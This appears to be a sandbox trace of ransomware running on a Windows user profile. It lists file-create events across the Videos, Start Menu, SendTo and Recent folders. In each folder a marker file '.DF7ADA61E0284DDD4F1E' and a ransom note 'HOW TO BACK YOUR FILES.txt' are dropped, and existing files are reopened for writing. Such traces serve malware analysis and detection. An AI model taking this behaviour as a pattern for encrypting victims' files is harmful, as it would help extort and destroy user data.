Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\6hXid1btCJcj.mp4 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\7GbHOe1SSO.swf desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\8EcMJo7Wsy.mkv desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\MgmW jtwFQJ_.mp4 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\ON2nN.swf desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\pAB-zP5fxaHcexmF.mkv desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\my3r vfCzZrQ-.swf desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\qHSU3A- l4yAMtggXeQ.flv desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\waEwyjT9rU.avi desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\ITXjK9.swf desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\W7uzAf.flv desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\yN3jjUv7Vb.avi desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\6 iJ LK5SpJWis.mkv desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\FeNApexe.swf desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\fRSFPyN.avi desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\Y_--WjEi-7.mp4 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\zcIRvyjTGm3.mp4 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Templates\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Templates\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Start Menu\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Start Menu\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Start Menu\Programs\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Start Menu\Programs\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Start Menu\Programs\Windows PowerShell\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Start Menu\Programs\Windows PowerShell\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Start Menu\Programs\System Tools\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Start Menu\Programs\System Tools\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Start Menu\Programs\Startup\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Start Menu\Programs\Startup\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Start Menu\Programs\Maintenance\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Start Menu\Programs\Maintenance\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Start Menu\Programs\Administrative Tools\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Start Menu\Programs\Administrative Tools\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Start Menu\Programs\Accessories\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Start Menu\Programs\Accessories\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Start Menu\Programs\Accessibility\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Start Menu\Programs\Accessibility\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\SendTo\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\SendTo\Compressed (zipped) Folder.ZFSendToTarget desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\SendTo\Desktop (create shortcut).DeskLink desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\SendTo\Documents.mydocs desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\SendTo\Mail Recipient.MAPIMail desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\SendTo\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Searches\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Searches\Everywhere.search-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\Searches\Indexed Locations.search-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\Searches\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Searches\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Saved Games\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Saved Games\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\7e4dca80246863e3.customDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\9d1f905ce5044aee.customDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\f01b4d95cf55d32a.customDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\f18460fded109990.customDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\1044f75bed7c89a3.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\162797d679096999.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\1b4dd67f29cb1962.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\1b6ebacd7cd2f25a.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\1bc9bbbe61f14501.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\319f01bf9fe00f2d.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\5175b273ceba776b.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\61ebb1e65cfcb8da.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\6824f4a902c78fbd.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\6d2bac8f1edf6668.automaticDestinations-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
